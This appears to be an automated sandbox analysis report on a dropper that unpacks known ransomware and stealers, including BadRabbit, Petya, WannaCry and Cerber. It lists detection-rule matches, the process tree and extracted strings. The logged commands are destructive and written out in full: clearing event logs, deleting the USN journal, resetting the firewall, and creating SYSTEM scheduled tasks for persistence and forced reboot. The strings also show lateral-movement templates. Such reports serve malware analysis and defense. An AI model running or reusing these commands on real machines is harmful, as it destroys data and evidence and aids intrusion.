        Source: 9.2.Endermanch@BadRabbit.exe.115fb00.1.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 13.2.Endermanch@Cerber5.exe.4e50000.2.raw.unpack, type: UNPACKEDPEMatched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
        Source: 47.2.Endermanch@Petya.A.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Petya_Ransomware date = 2016-03-24, author = Florian Roth, description = Detects Petya Ransomware, reference = http://www.heise.de/newsticker/meldung/Erpressungs-Trojaner-Petya-riegelt-den-gesamten-Rechner-ab-3150917.html, hash = 26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739
        Source: 47.2.Endermanch@Petya.A.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Ransom_Petya author = CCN-CERT, description = Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015, version = 1.0
        Source: 13.0.Endermanch@Cerber5.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
        Source: 0000002F.00000000.350343417.0000000000401000.00000020.00000001.01000000.00000015.sdmp, type: MEMORYMatched rule: Ransom_Petya author = CCN-CERT, description = Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015, version = 1.0
        Source: 0000000D.00000000.307768688.0000000000448000.00000020.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
        Source: 0000000C.00000003.314263722.0000000004A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93 date = 2017-10-24, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Christiaan Beek, description = Bad Rabbit Ransomware, source = https://pastebin.com/Y7pJv3tK, reference = BadRabbit
        Source: 0000001F.00000000.322395857.00007FF64E9AE000.00000008.00000001.01000000.00000010.sdmp, type: MEMORYMatched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
        Source: 0000000D.00000002.360524596.0000000001510000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
        Source: 0000000D.00000002.355663815.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
        Source: 0000000D.00000000.308250321.0000000000448000.00000020.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
        Source: 0000000D.00000000.306858920.0000000000448000.00000020.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
        Source: 0000001F.00000002.326734991.00007FF64E9AE000.00000004.00000001.01000000.00000010.sdmp, type: MEMORYMatched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
        Source: 0000001F.00000000.319806431.00007FF64E9AE000.00000008.00000001.01000000.00000010.sdmp, type: MEMORYMatched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
        Source: 0000000D.00000002.367850533.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
        Source: 0000002F.00000000.347435865.0000000000401000.00000020.00000001.01000000.00000015.sdmp, type: MEMORYMatched rule: Ransom_Petya author = CCN-CERT, description = Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015, version = 1.0
        Source: 0000002F.00000000.349191246.0000000000401000.00000020.00000001.01000000.00000015.sdmp, type: MEMORYMatched rule: Ransom_Petya author = CCN-CERT, description = Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015, version = 1.0
        Source: 0000000D.00000000.305189776.0000000000448000.00000020.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
        Source: 0000001F.00000000.322099134.00007FF64E9AE000.00000008.00000001.01000000.00000010.sdmp, type: MEMORYMatched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
        Source: 0000002F.00000002.534820405.000000000041A000.00000080.00000001.01000000.00000015.sdmp, type: MEMORYMatched rule: Ransom_Petya author = CCN-CERT, description = Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015, version = 1.0
        Source: 0000002F.00000000.351223575.0000000000401000.00000020.00000001.01000000.00000015.sdmp, type: MEMORYMatched rule: Ransom_Petya author = CCN-CERT, description = Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015, version = 1.0
        Source: Process Memory Space: 1jDe7zWnoe.exe PID: 5912, type: MEMORYSTRMatched rule: CobaltStrike_C2_Host_Indicator date = 2019-08-16, author = yara@s3c.za.net, description = Detects CobaltStrike C2 host artifacts
        Source: Process Memory Space: rundll32.exe PID: 5496, type: MEMORYSTRMatched rule: fe_cpe_ms17_010_ransomware date = 2017-06-27, author = ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick, description = probable petya ransomware using eternalblue, wmic, psexec, version = 1.1, reference = https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exe, type: DROPPEDMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe, type: DROPPEDMatched rule: MALWARE_Win_InfinityLock author = ditekSHen, description = Detects InfinityLock ransomware
        Source: C:\Windows\dispci.exe, type: DROPPEDMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: C:\Windows\dispci.exe, type: DROPPEDMatched rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93 date = 2017-10-24, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Christiaan Beek, description = Bad Rabbit Ransomware, source = https://pastebin.com/Y7pJv3tK, reference = BadRabbit
        Source: C:\Windows\cscc.dat, type: DROPPEDMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
        Source: C:\Users\user\AppData\Local\Temp\vizhwbnh.yaz\Endermanch@BadRabbit.exe, type: DROPPEDMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exe, type: DROPPEDMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exe, type: DROPPEDMatched rule: Petya_Ransomware date = 2016-03-24, author = Florian Roth, description = Detects Petya Ransomware, reference = http://www.heise.de/newsticker/meldung/Erpressungs-Trojaner-Petya-riegelt-den-gesamten-Rechner-ab-3150917.html, hash = 26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739
        Source: C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exe, type: DROPPEDMatched rule: Ransom_Petya author = CCN-CERT, description = Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015, version = 1.0
        Source: C:\Users\user\AppData\Local\Temp\nuxubd5j.5lo\Endermanch@WannaCrypt0r.exe, type: DROPPEDMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
        Source: C:\Users\user\AppData\Local\Temp\nuxubd5j.5lo\Endermanch@WannaCrypt0r.exe, type: DROPPEDMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
        Source: C:\Users\user\AppData\Local\Temp\nuxubd5j.5lo\Endermanch@WannaCrypt0r.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
        Source: C:\Windows\SysWOW64\rundll32.exeFile deleted: C:\Windows\infpub.datJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_04778A23 InitiateSystemShutdownExW,ExitWindowsEx,ExitProcess,12_2_04778A23
        Source: C:\Users\user\AppData\Local\Temp\vizhwbnh.yaz\Endermanch@BadRabbit.exeFile created: C:\Windows\infpub.datJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeCode function: String function: 004039AC appears 58 times
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeCode function: 11_2_004078A0 CallWindowProcA,NtdllDefWindowProc_A,11_2_004078A0
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeCode function: 11_2_00405E18 SetWindowLongA,GetWindowLongA,NtdllDefWindowProc_A,11_2_00405E18
        Source: Endermanch@WannaCrypt0r.exe.0.drStatic PE information: Resource name: XIA type: Zip archive data, at least v2.0 to extract, compression method=deflate
        Source: Endermanch@PolyRansom.exe.0.drStatic PE information: No import functions for PE file found
        Source: Endermanch@ViraLock.exe.0.drStatic PE information: No import functions for PE file found
        Source: 1jDe7zWnoe.exe, 00000000.00000000.260646181.00000262E7CC8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamed.exe$ vs 1jDe7zWnoe.exe
        Source: 1jDe7zWnoe.exe, 00000000.00000002.579837323.000002628013F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamediskpart.exej% vs 1jDe7zWnoe.exe
        Source: 1jDe7zWnoe.exeBinary or memory string: OriginalFilenamed.exe$ vs 1jDe7zWnoe.exe
        Source: C:\Windows\SysWOW64\wevtutil.exeProcess token adjusted: Security
        Source: 1jDe7zWnoe.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: Endermanch@NoMoreRansom.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: Endermanch@HappyAntivirus.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: Endermanch@AntivirusPro2017.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: csrss.exe.39.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: Fantom.exe.0.drStatic PE information: Section: .rsrc ZLIB complexity 0.9916272410358565
        Source: Endermanch@Xyeta.exe.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9942863805970149
        Source: 1jDe7zWnoe.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: DECRYPT.lnk.36.drLNK file: ..\..\..\Windows\dispci.exe
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeFile created: C:\Users\user\Desktop\BadRabbit.zipJump to behavior
        Source: classification engineClassification label: mal100.rans.spre.troj.spyw.expl.evad.winEXE@112/191@20/100
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: OpenSCManagerW,GetLastError,CreateServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,12_2_04771368
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,GetLastError,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,OpenSCManagerW,memset,GetSystemTimeAsFileTime,wsprintfW,CreateServiceW,StartServiceW,GetLastError,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,DeleteFileW,WNetCancelConnection2W,SetLastError,12_2_04779534
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_04779534 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,GetLastError,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,OpenSCManagerW,memset,GetSystemTimeAsFileTime,wsprintfW,CreateServiceW,StartServiceW,GetLastError,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,DeleteFileW,WNetCancelConnection2W,SetLastError,12_2_04779534
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_04778313 FindResourceW,LoadResource,LockResource,SizeofResource,GetProcessHeap,GetProcessHeap,HeapAlloc,RtlAllocateHeap,memcpy,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,GetProcessHeap,RtlFreeHeap,12_2_04778313
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe.AAB132EA333C275065A60A73435181F73B4DDCA1A50057D9334D6FC274E8027C
        Source: rundll32.exe, 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.342821374.0000000002FDA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxXFoSxpTqVsR4lOm5KB2S8ap4TinG/GN/SVNBFwllpRhV/vRWNmKgKIdROvkHxyALuJyUuCZlIoaJ5tB0YkATEHEyRsLcntZYsdwH1P+NmXiNg2MH5lZ9bEOk7YTMfwVKNqtHaX0LJOyAkx4NR0DPOFLDQONW9OOhZSkRx3V7PC3Q29HHhyiKVCPJsOW1l1mNtwL7KX+7kfNe0CefByEWfSBt1tbkvjdeP2xBnPjb3GE1GA/oGcGjrXc6wV8WKsfYQIDAQAB.3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.\AppData\ProgramData\Program Files\Windows.encrypted*..Readme.txt%s-h-f%dkernel32.dllIsWow64Process\\.\pipe\%ws"%ws" %wsiphlpapi.dllGetExtendedTcpTable%u.%u.%u.%uTERMSRV/127.0.0.1localhost0.0.0.0\rundll32.exe%ws C:\Windows\%ws,#1 %wsSeTcbPrivilegeSeShutdownPrivilegeSeDebugPrivilege%08X%08X/c %ws%wswevtutil cl %ws & SetupSystemSecurityApplicationfsutil usn deletejournal /D %c:schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "%ws" /ST %02d:%02d:00schtasks /Delete /F /TN drogon255.255.255.255%u.%u.%u.%uC:\Windows\System32\rundll32.exe "C:\Windows\",#2 \\%s\admin$\\%ws\admin$\%wsprocess call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1 "wbem\wmic.exe%ws WaitForMultipleObjectskernel32
        Source: fatalerror.exe.57.drBinary or memory string: @@@*\AE:\Exe Sales Customers\Ankur Rajput\8669335430\VB6\Project1.vbp
        Source: rundll32.exe, 0000000C.00000003.314263722.0000000004A41000.00000004.00000800.00020000.00000000.sdmp, dispci.exe, 00000024.00000000.330427642.0000000001243000.00000002.00000001.01000000.00000013.sdmp, dispci.exe.12.drBinary or memory string: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxXFoSxpTqVsR4lOm5KB2S8ap4TinG/GN/SVNBFwllpRhV/vRWNmKgKIdROvkHxyALuJyUuCZlIoaJ5tB0YkATEHEyRsLcntZYsdwH1P+NmXiNg2MH5lZ9bEOk7YTMfwVKNqtHaX0LJOyAkx4NR0DPOFLDQONW9OOhZSkRx3V7PC3Q29HHhyiKVCPJsOW1l1mNtwL7KX+7kfNe0CefByEWfSBt1tbkvjdeP2xBnPjb3GE1GA/oGcGjrXc6wV8WKsfYQIDAQAB.3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.\AppData\ProgramData\Program Files\Windows.encrypted%lS OK
        Source: 1jDe7zWnoe.exeReversingLabs: Detection: 64%
        Source: 1jDe7zWnoe.exeVirustotal: Detection: 52%
        Source: 1jDe7zWnoe.exeMetadefender: Detection: 29%
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\1jDe7zWnoe.exe "C:\Users\user\Desktop\1jDe7zWnoe.exe"
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
        Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
        Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
        Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
        Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
        Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k netsvcs -p
        Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess created: C:\Users\user\AppData\Local\Temp\vizhwbnh.yaz\Endermanch@BadRabbit.exe "C:\Users\user\AppData\Local\Temp\vizhwbnh.yaz\Endermanch@BadRabbit.exe"
        Source: C:\Users\user\AppData\Local\Temp\vizhwbnh.yaz\Endermanch@BadRabbit.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess created: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exe "C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exe"
        Source: C:\Users\user\AppData\Local\Temp\vizhwbnh.yaz\Endermanch@BadRabbit.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess created: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exe "C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exe"
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM explorer.exe
        Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN rhaegal
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegal
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess created: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe "C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe"
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 2112656973 && exit"
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess created: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exe "C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exe"
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
        Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 2112656973 && exit"
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:06:00
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\system32\netsh.exe advfirewall reset
        Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess created: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe "C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\EF39.tmp "C:\Windows\EF39.tmp" \\.\pipe\{96A4BC70-5646-4F34-828D-297F35E216CA}
        Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /C Start "" "C:\Windows\dispci.exe" -id 2112656973 && exit
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:06:00
        Source: C:\Windows\EF39.tmpProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\dispci.exe "C:\Windows\dispci.exe" -id 2112656973
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess created: C:\Users\user\AppData\Local\Temp\yz5ggchg.xck\Endermanch@Krotten.exe "C:\Users\user\AppData\Local\Temp\yz5ggchg.xck\Endermanch@Krotten.exe"
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess created: C:\Users\user\AppData\Local\Temp\101awtpm.1qs\Endermanch@NoMoreRansom.exe "C:\Users\user\AppData\Local\Temp\101awtpm.1qs\Endermanch@NoMoreRansom.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Setup
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN drogon
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\dispci.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl System
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN drogon
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess created: C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exe "C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Security
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Application
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\fsutil.exe fsutil usn deletejournal /D C:
